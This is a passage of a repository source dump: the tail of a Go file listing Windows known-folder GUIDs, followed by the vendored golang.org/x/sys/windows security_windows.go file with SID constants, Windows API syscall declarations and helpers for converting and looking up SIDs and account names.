FOLDERID_Playlists = &KNOWNFOLDERID{0xde92c1c7, 0x837f, 0x4f69, [8]byte{0xa3, 0xbb, 0x86, 0xe6, 0x31, 0x20, 0x4a, 0x23}} 72 | FOLDERID_SamplePlaylists = &KNOWNFOLDERID{0x15ca69b3, 0x30ee, 0x49c1, [8]byte{0xac, 0xe1, 0x6b, 0x5e, 0xc3, 0x72, 0xaf, 0xb5}} 73 | FOLDERID_SampleMusic = &KNOWNFOLDERID{0xb250c668, 0xf57d, 0x4ee1, [8]byte{0xa6, 0x3c, 0x29, 0x0e, 0xe7, 0xd1, 0xaa, 0x1f}} 74 | FOLDERID_SamplePictures = &KNOWNFOLDERID{0xc4900540, 0x2379, 0x4c75, [8]byte{0x84, 0x4b, 0x64, 0xe6, 0xfa, 0xf8, 0x71, 0x6b}} 75 | FOLDERID_SampleVideos = &KNOWNFOLDERID{0x859ead94, 0x2e85, 0x48ad, [8]byte{0xa7, 0x1a, 0x09, 0x69, 0xcb, 0x56, 0xa6, 0xcd}} 76 | FOLDERID_PhotoAlbums = &KNOWNFOLDERID{0x69d2cf90, 0xfc33, 0x4fb7, [8]byte{0x9a, 0x0c, 0xeb, 0xb0, 0xf0, 0xfc, 0xb4, 0x3c}} 77 | FOLDERID_Public = &KNOWNFOLDERID{0xdfdf76a2, 0xc82a, 0x4d63, [8]byte{0x90, 0x6a, 0x56, 0x44, 0xac, 0x45, 0x73, 0x85}} 78 | FOLDERID_ChangeRemovePrograms = &KNOWNFOLDERID{0xdf7266ac, 0x9274, 0x4867, [8]byte{0x8d, 0x55, 0x3b, 0xd6, 0x61, 0xde, 0x87, 0x2d}} 79 | FOLDERID_AppUpdates = &KNOWNFOLDERID{0xa305ce99, 0xf527, 0x492b, [8]byte{0x8b, 0x1a, 0x7e, 0x76, 0xfa, 0x98, 0xd6, 0xe4}} 80 | FOLDERID_AddNewPrograms = &KNOWNFOLDERID{0xde61d971, 0x5ebc, 0x4f02, [8]byte{0xa3, 0xa9, 0x6c, 0x82, 0x89, 0x5e, 0x5c, 0x04}} 81 | FOLDERID_Downloads = &KNOWNFOLDERID{0x374de290, 0x123f, 0x4565, [8]byte{0x91, 0x64, 0x39, 0xc4, 0x92, 0x5e, 0x46, 0x7b}} 82 | FOLDERID_PublicDownloads = &KNOWNFOLDERID{0x3d644c9b, 0x1fb8, 0x4f30, [8]byte{0x9b, 0x45, 0xf6, 0x70, 0x23, 0x5f, 0x79, 0xc0}} 83 | FOLDERID_SavedSearches = &KNOWNFOLDERID{0x7d1d3a04, 0xdebb, 0x4115, [8]byte{0x95, 0xcf, 0x2f, 0x29, 0xda, 0x29, 0x20, 0xda}} 84 | FOLDERID_QuickLaunch = &KNOWNFOLDERID{0x52a4f021, 0x7b75, 0x48a9, [8]byte{0x9f, 0x6b, 0x4b, 0x87, 0xa2, 0x10, 0xbc, 0x8f}} 85 | FOLDERID_Contacts = &KNOWNFOLDERID{0x56784854, 0xc6cb, 0x462b, [8]byte{0x81, 0x69, 0x88, 0xe3, 0x50, 0xac, 0xb8, 0x82}} 86 | FOLDERID_SidebarParts = &KNOWNFOLDERID{0xa75d362e, 0x50fc, 0x4fb7, [8]byte{0xac, 0x2c, 0xa8, 0xbe, 0xaa, 0x31, 0x44, 0x93}} 87 | FOLDERID_SidebarDefaultParts = &KNOWNFOLDERID{0x7b396e54, 0x9ec5, 0x4300, [8]byte{0xbe, 0x0a, 0x24, 0x82, 0xeb, 0xae, 0x1a, 0x26}} 88 | FOLDERID_PublicGameTasks = &KNOWNFOLDERID{0xdebf2536, 0xe1a8, 0x4c59, [8]byte{0xb6, 0xa2, 0x41, 0x45, 0x86, 0x47, 0x6a, 0xea}} 89 | FOLDERID_GameTasks = &KNOWNFOLDERID{0x054fae61, 0x4dd8, 0x4787, [8]byte{0x80, 0xb6, 0x09, 0x02, 0x20, 0xc4, 0xb7, 0x00}} 90 | FOLDERID_SavedGames = &KNOWNFOLDERID{0x4c5c32ff, 0xbb9d, 0x43b0, [8]byte{0xb5, 0xb4, 0x2d, 0x72, 0xe5, 0x4e, 0xaa, 0xa4}} 91 | FOLDERID_Games = &KNOWNFOLDERID{0xcac52c1a, 0xb53d, 0x4edc, [8]byte{0x92, 0xd7, 0x6b, 0x2e, 0x8a, 0xc1, 0x94, 0x34}} 92 | FOLDERID_SEARCH_MAPI = &KNOWNFOLDERID{0x98ec0e18, 0x2098, 0x4d44, [8]byte{0x86, 0x44, 0x66, 0x97, 0x93, 0x15, 0xa2, 0x81}} 93 | FOLDERID_SEARCH_CSC = &KNOWNFOLDERID{0xee32e446, 0x31ca, 0x4aba, [8]byte{0x81, 0x4f, 0xa5, 0xeb, 0xd2, 0xfd, 0x6d, 0x5e}} 94 | FOLDERID_Links = &KNOWNFOLDERID{0xbfb9d5e0, 0xc6a9, 0x404c, [8]byte{0xb2, 0xb2, 0xae, 0x6d, 0xb6, 0xaf, 0x49, 0x68}} 95 | FOLDERID_UsersFiles = &KNOWNFOLDERID{0xf3ce0f7c, 0x4901, 0x4acc, [8]byte{0x86, 0x48, 0xd5, 0xd4, 0x4b, 0x04, 0xef, 0x8f}} 96 | FOLDERID_UsersLibraries = &KNOWNFOLDERID{0xa302545d, 0xdeff, 0x464b, [8]byte{0xab, 0xe8, 0x61, 0xc8, 0x64, 0x8d, 0x93, 0x9b}} 97 | FOLDERID_SearchHome = &KNOWNFOLDERID{0x190337d1, 0xb8ca, 0x4121, [8]byte{0xa6, 0x39, 0x6d, 0x47, 0x2d, 0x16, 0x97, 0x2a}} 98 | FOLDERID_OriginalImages = &KNOWNFOLDERID{0x2c36c0aa, 0x5812, 0x4b87, [8]byte{0xbf, 0xd0, 0x4c, 0xd0, 0xdf, 0xb1, 0x9b, 0x39}} 99 | FOLDERID_DocumentsLibrary = &KNOWNFOLDERID{0x7b0db17d, 0x9cd2, 0x4a93, [8]byte{0x97, 0x33, 0x46, 0xcc, 0x89, 0x02, 0x2e, 0x7c}} 100 | FOLDERID_MusicLibrary = &KNOWNFOLDERID{0x2112ab0a, 0xc86a, 0x4ffe, [8]byte{0xa3, 0x68, 0x0d, 0xe9, 0x6e, 0x47, 0x01, 0x2e}} 101 | FOLDERID_PicturesLibrary = &KNOWNFOLDERID{0xa990ae9f, 0xa03b, 0x4e80, [8]byte{0x94, 0xbc, 0x99, 0x12, 0xd7, 0x50, 0x41, 0x04}} 102 | FOLDERID_VideosLibrary = &KNOWNFOLDERID{0x491e922f, 0x5643, 0x4af4, [8]byte{0xa7, 0xeb, 0x4e, 0x7a, 0x13, 0x8d, 0x81, 0x74}} 103 | FOLDERID_RecordedTVLibrary = &KNOWNFOLDERID{0x1a6fdba2, 0xf42d, 0x4358, [8]byte{0xa7, 0x98, 0xb7, 0x4d, 0x74, 0x59, 0x26, 0xc5}} 104 | FOLDERID_HomeGroup = &KNOWNFOLDERID{0x52528a6b, 0xb9e3, 0x4add, [8]byte{0xb6, 0x0d, 0x58, 0x8c, 0x2d, 0xba, 0x84, 0x2d}} 105 | FOLDERID_HomeGroupCurrentUser = &KNOWNFOLDERID{0x9b74b6a3, 0x0dfd, 0x4f11, [8]byte{0x9e, 0x78, 0x5f, 0x78, 0x00, 0xf2, 0xe7, 0x72}} 106 | FOLDERID_DeviceMetadataStore = &KNOWNFOLDERID{0x5ce4a5e9, 0xe4eb, 0x479d, [8]byte{0xb8, 0x9f, 0x13, 0x0c, 0x02, 0x88, 0x61, 0x55}} 107 | FOLDERID_Libraries = &KNOWNFOLDERID{0x1b3ea5dc, 0xb587, 0x4786, [8]byte{0xb4, 0xef, 0xbd, 0x1d, 0xc3, 0x32, 0xae, 0xae}} 108 | FOLDERID_PublicLibraries = &KNOWNFOLDERID{0x48daf80b, 0xe6cf, 0x4f4e, [8]byte{0xb8, 0x00, 0x0e, 0x69, 0xd8, 0x4e, 0xe3, 0x84}} 109 | FOLDERID_UserPinned = &KNOWNFOLDERID{0x9e3995ab, 0x1f9c, 0x4f13, [8]byte{0xb8, 0x27, 0x48, 0xb2, 0x4b, 0x6c, 0x71, 0x74}} 110 | FOLDERID_ImplicitAppShortcuts = &KNOWNFOLDERID{0xbcb5256f, 0x79f6, 0x4cee, [8]byte{0xb7, 0x25, 0xdc, 0x34, 0xe4, 0x02, 0xfd, 0x46}} 111 | FOLDERID_AccountPictures = &KNOWNFOLDERID{0x008ca0b1, 0x55b4, 0x4c56, [8]byte{0xb8, 0xa8, 0x4d, 0xe4, 0xb2, 0x99, 0xd3, 0xbe}} 112 | FOLDERID_PublicUserTiles = &KNOWNFOLDERID{0x0482af6c, 0x08f1, 0x4c34, [8]byte{0x8c, 0x90, 0xe1, 0x7e, 0xc9, 0x8b, 0x1e, 0x17}} 113 | FOLDERID_AppsFolder = &KNOWNFOLDERID{0x1e87508d, 0x89c2, 0x42f0, [8]byte{0x8a, 0x7e, 0x64, 0x5a, 0x0f, 0x50, 0xca, 0x58}} 114 | FOLDERID_StartMenuAllPrograms = &KNOWNFOLDERID{0xf26305ef, 0x6948, 0x40b9, [8]byte{0xb2, 0x55, 0x81, 0x45, 0x3d, 0x09, 0xc7, 0x85}} 115 | FOLDERID_CommonStartMenuPlaces = &KNOWNFOLDERID{0xa440879f, 0x87a0, 0x4f7d, [8]byte{0xb7, 0x00, 0x02, 0x07, 0xb9, 0x66, 0x19, 0x4a}} 116 | FOLDERID_ApplicationShortcuts = &KNOWNFOLDERID{0xa3918781, 0xe5f2, 0x4890, [8]byte{0xb3, 0xd9, 0xa7, 0xe5, 0x43, 0x32, 0x32, 0x8c}} 117 | FOLDERID_RoamingTiles = &KNOWNFOLDERID{0x00bcfc5a, 0xed94, 0x4e48, [8]byte{0x96, 0xa1, 0x3f, 0x62, 0x17, 0xf2, 0x19, 0x90}} 118 | FOLDERID_RoamedTileImages = &KNOWNFOLDERID{0xaaa8d5a5, 0xf1d6, 0x4259, [8]byte{0xba, 0xa8, 0x78, 0xe7, 0xef, 0x60, 0x83, 0x5e}} 119 | FOLDERID_Screenshots = &KNOWNFOLDERID{0xb7bede81, 0xdf94, 0x4682, [8]byte{0xa7, 0xd8, 0x57, 0xa5, 0x26, 0x20, 0xb8, 0x6f}} 120 | FOLDERID_CameraRoll = &KNOWNFOLDERID{0xab5fb87b, 0x7ce2, 0x4f83, [8]byte{0x91, 0x5d, 0x55, 0x08, 0x46, 0xc9, 0x53, 0x7b}} 121 | FOLDERID_SkyDrive = &KNOWNFOLDERID{0xa52bba46, 0xe9e1, 0x435f, [8]byte{0xb3, 0xd9, 0x28, 0xda, 0xa6, 0x48, 0xc0, 0xf6}} 122 | FOLDERID_OneDrive = &KNOWNFOLDERID{0xa52bba46, 0xe9e1, 0x435f, [8]byte{0xb3, 0xd9, 0x28, 0xda, 0xa6, 0x48, 0xc0, 0xf6}} 123 | FOLDERID_SkyDriveDocuments = &KNOWNFOLDERID{0x24d89e24, 0x2f19, 0x4534, [8]byte{0x9d, 0xde, 0x6a, 0x66, 0x71, 0xfb, 0xb8, 0xfe}} 124 | FOLDERID_SkyDrivePictures = &KNOWNFOLDERID{0x339719b5, 0x8c47, 0x4894, [8]byte{0x94, 0xc2, 0xd8, 0xf7, 0x7a, 0xdd, 0x44, 0xa6}} 125 | FOLDERID_SkyDriveMusic = &KNOWNFOLDERID{0xc3f2459e, 0x80d6, 0x45dc, [8]byte{0xbf, 0xef, 0x1f, 0x76, 0x9f, 0x2b, 0xe7, 0x30}} 126 | FOLDERID_SkyDriveCameraRoll = &KNOWNFOLDERID{0x767e6811, 0x49cb, 0x4273, [8]byte{0x87, 0xc2, 0x20, 0xf3, 0x55, 0xe1, 0x08, 0x5b}} 127 | FOLDERID_SearchHistory = &KNOWNFOLDERID{0x0d4c3db6, 0x03a3, 0x462f, [8]byte{0xa0, 0xe6, 0x08, 0x92, 0x4c, 0x41, 0xb5, 0xd4}} 128 | FOLDERID_SearchTemplates = &KNOWNFOLDERID{0x7e636bfe, 0xdfa9, 0x4d5e, [8]byte{0xb4, 0x56, 0xd7, 0xb3, 0x98, 0x51, 0xd8, 0xa9}} 129 | FOLDERID_CameraRollLibrary = &KNOWNFOLDERID{0x2b20df75, 0x1eda, 0x4039, [8]byte{0x80, 0x97, 0x38, 0x79, 0x82, 0x27, 0xd5, 0xb7}} 130 | FOLDERID_SavedPictures = &KNOWNFOLDERID{0x3b193882, 0xd3ad, 0x4eab, [8]byte{0x96, 0x5a, 0x69, 0x82, 0x9d, 0x1f, 0xb5, 0x9f}} 131 | FOLDERID_SavedPicturesLibrary = &KNOWNFOLDERID{0xe25b5812, 0xbe88, 0x4bd9, [8]byte{0x94, 0xb0, 0x29, 0x23, 0x34, 0x77, 0xb6, 0xc3}} 132 | FOLDERID_RetailDemo = &KNOWNFOLDERID{0x12d4c69e, 0x24ad, 0x4923, [8]byte{0xbe, 0x19, 0x31, 0x32, 0x1c, 0x43, 0xa7, 0x67}} 133 | FOLDERID_Device = &KNOWNFOLDERID{0x1c2ac1dc, 0x4358, 0x4b6c, [8]byte{0x97, 0x33, 0xaf, 0x21, 0x15, 0x65, 0x76, 0xf0}} 134 | FOLDERID_DevelopmentFiles = &KNOWNFOLDERID{0xdbe8e08e, 0x3053, 0x4bbc, [8]byte{0xb1, 0x83, 0x2a, 0x7b, 0x2b, 0x19, 0x1e, 0x59}} 135 | FOLDERID_Objects3D = &KNOWNFOLDERID{0x31c0dd25, 0x9439, 0x4f12, [8]byte{0xbf, 0x41, 0x7f, 0xf4, 0xed, 0xa3, 0x87, 0x22}} 136 | FOLDERID_AppCaptures = &KNOWNFOLDERID{0xedc0fe71, 0x98d8, 0x4f4a, [8]byte{0xb9, 0x20, 0xc8, 0xdc, 0x13, 0x3c, 0xb1, 0x65}} 137 | FOLDERID_LocalDocuments = &KNOWNFOLDERID{0xf42ee2d3, 0x909f, 0x4907, [8]byte{0x88, 0x71, 0x4c, 0x22, 0xfc, 0x0b, 0xf7, 0x56}} 138 | FOLDERID_LocalPictures = &KNOWNFOLDERID{0x0ddd015d, 0xb06c, 0x45d5, [8]byte{0x8c, 0x4c, 0xf5, 0x97, 0x13, 0x85, 0x46, 0x39}} 139 | FOLDERID_LocalVideos = &KNOWNFOLDERID{0x35286a68, 0x3c57, 0x41a1, [8]byte{0xbb, 0xb1, 0x0e, 0xae, 0x73, 0xd7, 0x6c, 0x95}} 140 | FOLDERID_LocalMusic = &KNOWNFOLDERID{0xa0c69a99, 0x21c8, 0x4671, [8]byte{0x87, 0x03, 0x79, 0x34, 0x16, 0x2f, 0xcf, 0x1d}} 141 | FOLDERID_LocalDownloads = &KNOWNFOLDERID{0x7d83ee9b, 0x2244, 0x4e70, [8]byte{0xb1, 0xf5, 0x53, 0x93, 0x04, 0x2a, 0xf1, 0xe4}} 142 | FOLDERID_RecordedCalls = &KNOWNFOLDERID{0x2f8b40c2, 0x83ed, 0x48ee, [8]byte{0xb3, 0x83, 0xa1, 0xf1, 0x57, 0xec, 0x6f, 0x9a}} 143 | FOLDERID_AllAppMods = &KNOWNFOLDERID{0x7ad67899, 0x66af, 0x43ba, [8]byte{0x91, 0x56, 0x6a, 0xad, 0x42, 0xe6, 0xc5, 0x96}} 144 | FOLDERID_CurrentAppMods = &KNOWNFOLDERID{0x3db40b20, 0x2a30, 0x4dbe, [8]byte{0x91, 0x7e, 0x77, 0x1d, 0xd2, 0x1d, 0xd0, 0x99}} 145 | FOLDERID_AppDataDesktop = &KNOWNFOLDERID{0xb2c5e279, 0x7add, 0x439f, [8]byte{0xb2, 0x8c, 0xc4, 0x1f, 0xe1, 0xbb, 0xf6, 0x72}} 146 | FOLDERID_AppDataDocuments = &KNOWNFOLDERID{0x7be16610, 0x1f7f, 0x44ac, [8]byte{0xbf, 0xf0, 0x83, 0xe1, 0x5f, 0x2f, 0xfc, 0xa1}} 147 | FOLDERID_AppDataFavorites = &KNOWNFOLDERID{0x7cfbefbc, 0xde1f, 0x45aa, [8]byte{0xb8, 0x43, 0xa5, 0x42, 0xac, 0x53, 0x6c, 0xc9}} 148 | FOLDERID_AppDataProgramData = &KNOWNFOLDERID{0x559d40a3, 0xa036, 0x40fa, [8]byte{0xaf, 0x61, 0x84, 0xcb, 0x43, 0x0a, 0x4d, 0x34}} 149 | ) 150 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/security_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | import ( 8 | "syscall" 9 | "unsafe" 10 | 11 | "golang.org/x/sys/internal/unsafeheader" 12 | ) 13 | 14 | const ( 15 | NameUnknown = 0 16 | NameFullyQualifiedDN = 1 17 | NameSamCompatible = 2 18 | NameDisplay = 3 19 | NameUniqueId = 6 20 | NameCanonical = 7 21 | NameUserPrincipal = 8 22 | NameCanonicalEx = 9 23 | NameServicePrincipal = 10 24 | NameDnsDomain = 12 25 | ) 26 | 27 | // This function returns 1 byte BOOLEAN rather than the 4 byte BOOL. 28 | // http://blogs.msdn.com/b/drnick/archive/2007/12/19/windows-and-upn-format-credentials.aspx 29 | //sys TranslateName(accName *uint16, accNameFormat uint32, desiredNameFormat uint32, translatedName *uint16, nSize *uint32) (err error) [failretval&0xff==0] = secur32.TranslateNameW 30 | //sys GetUserNameEx(nameFormat uint32, nameBuffre *uint16, nSize *uint32) (err error) [failretval&0xff==0] = secur32.GetUserNameExW 31 | 32 | // TranslateAccountName converts a directory service 33 | // object name from one format to another. 34 | func TranslateAccountName(username string, from, to uint32, initSize int) (string, error) { 35 | u, e := UTF16PtrFromString(username) 36 | if e != nil { 37 | return "", e 38 | } 39 | n := uint32(50) 40 | for { 41 | b := make([]uint16, n) 42 | e = TranslateName(u, from, to, &b[0], &n) 43 | if e == nil { 44 | return UTF16ToString(b[:n]), nil 45 | } 46 | if e != ERROR_INSUFFICIENT_BUFFER { 47 | return "", e 48 | } 49 | if n <= uint32(len(b)) { 50 | return "", e 51 | } 52 | } 53 | } 54 | 55 | const ( 56 | // do not reorder 57 | NetSetupUnknownStatus = iota 58 | NetSetupUnjoined 59 | NetSetupWorkgroupName 60 | NetSetupDomainName 61 | ) 62 | 63 | type UserInfo10 struct { 64 | Name *uint16 65 | Comment *uint16 66 | UsrComment *uint16 67 | FullName *uint16 68 | } 69 | 70 | //sys NetUserGetInfo(serverName *uint16, userName *uint16, level uint32, buf **byte) (neterr error) = netapi32.NetUserGetInfo 71 | //sys NetGetJoinInformation(server *uint16, name **uint16, bufType *uint32) (neterr error) = netapi32.NetGetJoinInformation 72 | //sys NetApiBufferFree(buf *byte) (neterr error) = netapi32.NetApiBufferFree 73 | 74 | const ( 75 | // do not reorder 76 | SidTypeUser = 1 + iota 77 | SidTypeGroup 78 | SidTypeDomain 79 | SidTypeAlias 80 | SidTypeWellKnownGroup 81 | SidTypeDeletedAccount 82 | SidTypeInvalid 83 | SidTypeUnknown 84 | SidTypeComputer 85 | SidTypeLabel 86 | ) 87 | 88 | type SidIdentifierAuthority struct { 89 | Value [6]byte 90 | } 91 | 92 | var ( 93 | SECURITY_NULL_SID_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 0}} 94 | SECURITY_WORLD_SID_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 1}} 95 | SECURITY_LOCAL_SID_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 2}} 96 | SECURITY_CREATOR_SID_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 3}} 97 | SECURITY_NON_UNIQUE_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 4}} 98 | SECURITY_NT_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 5}} 99 | SECURITY_MANDATORY_LABEL_AUTHORITY = SidIdentifierAuthority{[6]byte{0, 0, 0, 0, 0, 16}} 100 | ) 101 | 102 | const ( 103 | SECURITY_NULL_RID = 0 104 | SECURITY_WORLD_RID = 0 105 | SECURITY_LOCAL_RID = 0 106 | SECURITY_CREATOR_OWNER_RID = 0 107 | SECURITY_CREATOR_GROUP_RID = 1 108 | SECURITY_DIALUP_RID = 1 109 | SECURITY_NETWORK_RID = 2 110 | SECURITY_BATCH_RID = 3 111 | SECURITY_INTERACTIVE_RID = 4 112 | SECURITY_LOGON_IDS_RID = 5 113 | SECURITY_SERVICE_RID = 6 114 | SECURITY_LOCAL_SYSTEM_RID = 18 115 | SECURITY_BUILTIN_DOMAIN_RID = 32 116 | SECURITY_PRINCIPAL_SELF_RID = 10 117 | SECURITY_CREATOR_OWNER_SERVER_RID = 0x2 118 | SECURITY_CREATOR_GROUP_SERVER_RID = 0x3 119 | SECURITY_LOGON_IDS_RID_COUNT = 0x3 120 | SECURITY_ANONYMOUS_LOGON_RID = 0x7 121 | SECURITY_PROXY_RID = 0x8 122 | SECURITY_ENTERPRISE_CONTROLLERS_RID = 0x9 123 | SECURITY_SERVER_LOGON_RID = SECURITY_ENTERPRISE_CONTROLLERS_RID 124 | SECURITY_AUTHENTICATED_USER_RID = 0xb 125 | SECURITY_RESTRICTED_CODE_RID = 0xc 126 | SECURITY_NT_NON_UNIQUE_RID = 0x15 127 | ) 128 | 129 | // Predefined domain-relative RIDs for local groups. 130 | // See https://msdn.microsoft.com/en-us/library/windows/desktop/aa379649(v=vs.85).aspx 131 | const ( 132 | DOMAIN_ALIAS_RID_ADMINS = 0x220 133 | DOMAIN_ALIAS_RID_USERS = 0x221 134 | DOMAIN_ALIAS_RID_GUESTS = 0x222 135 | DOMAIN_ALIAS_RID_POWER_USERS = 0x223 136 | DOMAIN_ALIAS_RID_ACCOUNT_OPS = 0x224 137 | DOMAIN_ALIAS_RID_SYSTEM_OPS = 0x225 138 | DOMAIN_ALIAS_RID_PRINT_OPS = 0x226 139 | DOMAIN_ALIAS_RID_BACKUP_OPS = 0x227 140 | DOMAIN_ALIAS_RID_REPLICATOR = 0x228 141 | DOMAIN_ALIAS_RID_RAS_SERVERS = 0x229 142 | DOMAIN_ALIAS_RID_PREW2KCOMPACCESS = 0x22a 143 | DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS = 0x22b 144 | DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS = 0x22c 145 | DOMAIN_ALIAS_RID_INCOMING_FOREST_TRUST_BUILDERS = 0x22d 146 | DOMAIN_ALIAS_RID_MONITORING_USERS = 0x22e 147 | DOMAIN_ALIAS_RID_LOGGING_USERS = 0x22f 148 | DOMAIN_ALIAS_RID_AUTHORIZATIONACCESS = 0x230 149 | DOMAIN_ALIAS_RID_TS_LICENSE_SERVERS = 0x231 150 | DOMAIN_ALIAS_RID_DCOM_USERS = 0x232 151 | DOMAIN_ALIAS_RID_IUSERS = 0x238 152 | DOMAIN_ALIAS_RID_CRYPTO_OPERATORS = 0x239 153 | DOMAIN_ALIAS_RID_CACHEABLE_PRINCIPALS_GROUP = 0x23b 154 | DOMAIN_ALIAS_RID_NON_CACHEABLE_PRINCIPALS_GROUP = 0x23c 155 | DOMAIN_ALIAS_RID_EVENT_LOG_READERS_GROUP = 0x23d 156 | DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP = 0x23e 157 | ) 158 | 159 | //sys LookupAccountSid(systemName *uint16, sid *SID, name *uint16, nameLen *uint32, refdDomainName *uint16, refdDomainNameLen *uint32, use *uint32) (err error) = advapi32.LookupAccountSidW 160 | //sys LookupAccountName(systemName *uint16, accountName *uint16, sid *SID, sidLen *uint32, refdDomainName *uint16, refdDomainNameLen *uint32, use *uint32) (err error) = advapi32.LookupAccountNameW 161 | //sys ConvertSidToStringSid(sid *SID, stringSid **uint16) (err error) = advapi32.ConvertSidToStringSidW 162 | //sys ConvertStringSidToSid(stringSid *uint16, sid **SID) (err error) = advapi32.ConvertStringSidToSidW 163 | //sys GetLengthSid(sid *SID) (len uint32) = advapi32.GetLengthSid 164 | //sys CopySid(destSidLen uint32, destSid *SID, srcSid *SID) (err error) = advapi32.CopySid 165 | //sys AllocateAndInitializeSid(identAuth *SidIdentifierAuthority, subAuth byte, subAuth0 uint32, subAuth1 uint32, subAuth2 uint32, subAuth3 uint32, subAuth4 uint32, subAuth5 uint32, subAuth6 uint32, subAuth7 uint32, sid **SID) (err error) = advapi32.AllocateAndInitializeSid 166 | //sys createWellKnownSid(sidType WELL_KNOWN_SID_TYPE, domainSid *SID, sid *SID, sizeSid *uint32) (err error) = advapi32.CreateWellKnownSid 167 | //sys isWellKnownSid(sid *SID, sidType WELL_KNOWN_SID_TYPE) (isWellKnown bool) = advapi32.IsWellKnownSid 168 | //sys FreeSid(sid *SID) (err error) [failretval!=0] = advapi32.FreeSid 169 | //sys EqualSid(sid1 *SID, sid2 *SID) (isEqual bool) = advapi32.EqualSid 170 | //sys getSidIdentifierAuthority(sid *SID) (authority *SidIdentifierAuthority) = advapi32.GetSidIdentifierAuthority 171 | //sys getSidSubAuthorityCount(sid *SID) (count *uint8) = advapi32.GetSidSubAuthorityCount 172 | //sys getSidSubAuthority(sid *SID, index uint32) (subAuthority *uint32) = advapi32.GetSidSubAuthority 173 | //sys isValidSid(sid *SID) (isValid bool) = advapi32.IsValidSid 174 | 175 | // The security identifier (SID) structure is a variable-length 176 | // structure used to uniquely identify users or groups. 177 | type SID struct{} 178 | 179 | // StringToSid converts a string-format security identifier 180 | // SID into a valid, functional SID. 181 | func StringToSid(s string) (*SID, error) { 182 | var sid *SID 183 | p, e := UTF16PtrFromString(s) 184 | if e != nil { 185 | return nil, e 186 | } 187 | e = ConvertStringSidToSid(p, &sid) 188 | if e != nil { 189 | return nil, e 190 | } 191 | defer LocalFree((Handle)(unsafe.Pointer(sid))) 192 | return sid.Copy() 193 | } 194 | 195 | // LookupSID retrieves a security identifier SID for the account 196 | // and the name of the domain on which the account was found. 197 | // System specify target computer to search. 198 | func LookupSID(system, account string) (sid *SID, domain string, accType uint32, err error) { 199 | if len(account) == 0 { 200 | return nil, "", 0, syscall.EINVAL 201 | } 202 | acc, e := UTF16PtrFromString(account) 203 | if e != nil { 204 | return nil, "", 0, e 205 | } 206 | var sys *uint16 207 | if len(system) > 0 { 208 | sys, e = UTF16PtrFromString(system) 209 | if e != nil { 210 | return nil, "", 0, e 211 | } 212 | } 213 | n := uint32(50) 214 | dn := uint32(50) 215 | for { 216 | b := make([]byte, n) 217 | db := make([]uint16, dn) 218 | sid = (*SID)(unsafe.Pointer(&b[0])) 219 | e = LookupAccountName(sys, acc, sid, &n, &db[0], &dn, &accType) 220 | if e == nil { 221 | return sid, UTF16ToString(db), accType, nil 222 | } 223 | if e != ERROR_INSUFFICIENT_BUFFER { 224 | return nil, "", 0, e 225 | } 226 | if n <= uint32(len(b)) { 227 | return nil, "", 0, e 228 | } 229 | } 230 | } 231 | 232 | // String converts SID to a string format suitable for display, storage, or transmission. 233 | func (sid *SID) String() string { 234 | var s *uint16 235 | e := ConvertSidToStringSid(sid, &s) 236 | if e != nil { 237 | return "" 238 | } 239 | defer LocalFree((Handle)(unsafe.Pointer(s))) 240 | return UTF16ToString((*[256]uint16)(unsafe.Pointer(s))[:]) 241 | } 242 | 243 | // Len returns the length, in bytes, of a valid security identifier SID. 244 | func (sid *SID) Len() int { 245 | return int(GetLengthSid(sid)) 246 | } 247 | 248 | // Copy creates a duplicate of security identifier SID. 249 | func (sid *SID) Copy() (*SID, error) { 250 | b := make([]byte, sid.Len()) 251 | sid2 := (*SID)(unsafe.Pointer(&b[0])) 252 | e := CopySid(uint32(len(b)), sid2, sid) 253 | if e != nil { 254 | return nil, e 255 | } 256 | return sid2, nil 257 | } 258 | 259 | // IdentifierAuthority returns the identifier authority of the SID. 260 | func (sid *SID) IdentifierAuthority() SidIdentifierAuthority { 261 | return *getSidIdentifierAuthority(sid) 262 | } 263 | 264 | // SubAuthorityCount returns the number of sub-authorities in the SID. 265 | func (sid *SID) SubAuthorityCount() uint8 { 266 | return *getSidSubAuthorityCount(sid) 267 | } 268 | 269 | // SubAuthority returns the sub-authority of the SID as specified by 270 | // the index, which must be less than sid.SubAuthorityCount(). 271 | func (sid *SID) SubAuthority(idx uint32) uint32 { 272 | if idx >= uint32(sid.SubAuthorityCount()) { 273 | panic("sub-authority index out of range") 274 | } 275 | return *getSidSubAuthority(sid, idx) 276 | } 277 | 278 | // IsValid returns whether the SID has a valid revision and length. 279 | func (sid *SID) IsValid() bool { 280 | return isValidSid(sid) 281 | } 282 | 283 | // Equals compares two SIDs for equality. 284 | func (sid *SID) Equals(sid2 *SID) bool { 285 | return EqualSid(sid, sid2) 286 | } 287 | 288 | // IsWellKnown determines whether the SID matches the well-known sidType. 289 | func (sid *SID) IsWellKnown(sidType WELL_KNOWN_SID_TYPE) bool { 290 | return isWellKnownSid(sid, sidType) 291 | } 292 | 293 | // LookupAccount retrieves the name of the account for this SID 294 | // and the name of the first domain on which this SID is found. 295 | // System specify target computer to search for. 296 | func (sid *SID) LookupAccount(system string) (account, domain string, accType uint32, err error) { 297 | var sys *uint16 298 | if len(system) > 0 { 299 | sys, err = UTF16PtrFromString(system) 300 | if err != nil { 301 | return "", "", 0, err 302 | } 303 | } 304 | n := uint32(50) 305 | dn := uint32(50) 306 | for { 307 | b := make([]uint16, n) 308 | db := make([]uint16, dn) 309 | e := LookupAccountSid(sys, sid, &b[0], &n, &db[0], &dn, &accType) 310 | if e == nil { 311 | return UTF16ToString(b), UTF16ToString(db), accType, nil 312 | } 313 | if e != ERROR_INSUFFICIENT_BUFFER { 314 | return "", "", 0, e 315 | } 316 | if n <= uint32(len(b)) { 317 | return "", "", 0, e 318 | } 319 | } 320 | } 321 | 322 